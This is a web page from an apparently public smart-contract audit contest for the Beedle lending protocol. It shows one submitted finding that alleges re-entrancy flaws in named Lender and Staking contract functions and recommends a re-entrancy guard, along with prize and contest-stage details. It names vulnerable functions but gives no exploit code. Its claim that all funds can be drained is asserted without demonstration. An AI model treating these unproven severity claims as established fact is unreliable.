Beedle - Oracle free perpetual lending

BeedleFi

DeFiFoundry

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Re-entrancy

ChainSentry

Summary

Avoid state changes after transfer calls to prevent re-entrancy vulnerabilities.

Vulnerability Details

The Lender contract has several potential re-entrancy vulnerabilities due to state variables being written after external calls to transfer tokens. This could allow an attacker to re-enter the function before it is updated. The affected functions are borrow(), buyLoan(), giveLoan(), refinance(), repay(), seizeLoan(), and setPool(). Careful checks should be added to prevent re-entrancy.

The Staking contract claim() function is vulnerable to re-entrancy due to updating the balance state variable after transferring tokens. This could allow an attacker to drain funds. Protections need to be added.

Impact

All funds can be drained from the contract.

Tools Used

Manual Review

Recommendations

To mitigate this vulnerability, use OpenZeppelin's re-entrancy guard in both contracts and avoid updating the balance state variable after transferring tokens.

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

706

28 USDC / LOC

High Medium

18,000 USDC

Low

2,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!